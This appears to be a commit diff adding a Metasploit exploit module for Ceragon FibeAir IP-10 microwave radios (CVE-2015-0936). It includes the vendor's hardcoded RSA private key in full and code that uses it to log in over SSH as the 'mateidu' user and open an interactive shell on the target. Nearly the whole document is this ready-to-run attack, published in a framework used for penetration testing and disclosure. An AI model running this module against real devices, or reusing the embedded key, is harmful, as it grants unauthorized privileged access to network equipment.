|
| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'net/ssh' |
| 8 | + |
| 9 | +class Metasploit3 < Msf::Exploit::Remote |
| 10 | + include Msf::Auxiliary::Report |
| 11 | + |
| 12 | + Rank = ExcellentRanking |
| 13 | + |
| 14 | + def initialize(info = {}) |
| 15 | + super(update_info(info, { |
| 16 | + 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure', |
| 17 | + 'Description' => %q{ |
| 18 | + Ceragon ships a public/private key pair on FibeAir IP-10 devices |
| 19 | + that allows passwordless authentication to any other IP-10 device. |
| 20 | + Since the key is easily retrievable, an attacker can use it to |
| 21 | + gain unauthorized remote access as the "mateidu" user. |
| 22 | + }, |
| 23 | + 'Platform' => 'unix', |
| 24 | + 'Arch' => ARCH_CMD, |
| 25 | + 'Privileged' => true, |
| 26 | + 'Targets' => [ [ "Universal", {} ] ], |
| 27 | + 'Payload' => |
| 28 | + { |
| 29 | + 'Compat' => { |
| 30 | + 'PayloadType' => 'cmd_interact', |
| 31 | + 'ConnectionType' => 'find', |
| 32 | + }, |
| 33 | + }, |
| 34 | + 'Author' => [ |
| 35 | + 'hdm', # Discovery |
| 36 | + 'todb' # Metasploit module and advisory text (mostly copy-paste) |
| 37 | + ], |
| 38 | + 'License' => MSF_LICENSE, |
| 39 | + 'References' => |
| 40 | + [ |
| 41 | + ['CVE', '2015-0936'], |
| 42 | + ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure |
| 43 | + ['URL', 'hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass |
| 44 | + ], |
| 45 | + 'DisclosureDate' => "Apr 01 2015", # Not a joke |
| 46 | + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, |
| 47 | + 'DefaultTarget' => 0 |
| 48 | + })) |
| 49 | + |
| 50 | + register_options( |
| 51 | + [ |
| 52 | + # Since we don't include Tcp, we have to register this manually |
| 53 | + Opt::RHOST(), |
| 54 | + Opt::RPORT(22) |
| 55 | + ], self.class |
| 56 | + ) |
| 57 | + |
| 58 | + register_advanced_options( |
| 59 | + [ |
| 60 | + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), |
| 61 | + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) |
| 62 | + ] |
| 63 | + ) |
| 64 | + |
| 65 | + end |
| 66 | + |
| 67 | + # helper methods that normally come from Tcp |
| 68 | + def rhost |
| 69 | + datastore['RHOST'] |
| 70 | + end |
| 71 | + def rport |
| 72 | + datastore['RPORT'] |
| 73 | + end |
| 74 | + |
| 75 | + def do_login(user) |
| 76 | + opt_hash = { |
| 77 | + :auth_methods => ['publickey'], |
| 78 | + :msframework => framework, |
| 79 | + :msfmodule => self, |
| 80 | + :port => rport, |
| 81 | + :key_data => [ key_data ], |
| 82 | + :disable_agent => true, |
| 83 | + :config => false, |
| 84 | + :record_auth_info => true, |
| 85 | + :proxies => datastore['Proxies'] |
| 86 | + } |
| 87 | + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] |
| 88 | + begin |
| 89 | + ssh_socket = nil |
| 90 | + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do |
| 91 | + ssh_socket = Net::SSH.start(rhost, user, opt_hash) |
| 92 | + end |
| 93 | + rescue Rex::ConnectionError |
| 94 | + return nil |
| 95 | + rescue Net::SSH::Disconnect, ::EOFError |
| 96 | + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" |
| 97 | + return nil |
| 98 | + rescue ::Timeout::Error |
| 99 | + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" |
| 100 | + return nil |
| 101 | + rescue Net::SSH::AuthenticationFailed |
| 102 | + print_error "#{rhost}:#{rport} SSH - Failed authentication" |
| 103 | + return nil |
| 104 | + rescue Net::SSH::Exception => e |
| 105 | + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" |
| 106 | + return nil |
| 107 | + end |
| 108 | + |
| 109 | + if ssh_socket |
| 110 | + |
| 111 | + # Create a new session from the socket, then dump it. |
| 112 | + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) |
| 113 | + ssh_socket = nil |
| 114 | + |
| 115 | + return conn |
| 116 | + else |
| 117 | + return nil |
| 118 | + end |
| 119 | + end |
| 120 | + |
| 121 | + def exploit |
| 122 | + conn = do_login("mateidu") |
| 123 | + if conn |
| 124 | + print_good "#{rhost}:#{rport} - Successful login" |
| 125 | + handler(conn.lsock) |
| 126 | + end |
| 127 | + end |
| 128 | + |
| 129 | + def key_data |
| 130 | + <<EOF |
| 131 | +-----BEGIN RSA PRIVATE KEY----- |
| 132 | +MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr |
| 133 | +MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+ |
| 134 | +IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB |
| 135 | +gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3 |
| 136 | +CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv |
| 137 | +4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY |
| 138 | +SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6 |
| 139 | +B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV |
| 140 | +93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc |
| 141 | +WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP |
| 142 | +YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll |
| 143 | +7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT |
| 144 | +uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg== |
| 145 | +-----END RSA PRIVATE KEY----- |
| 146 | +EOF |
| 147 | + end |
| 148 | +end |
| 149 | + |
0 commit comments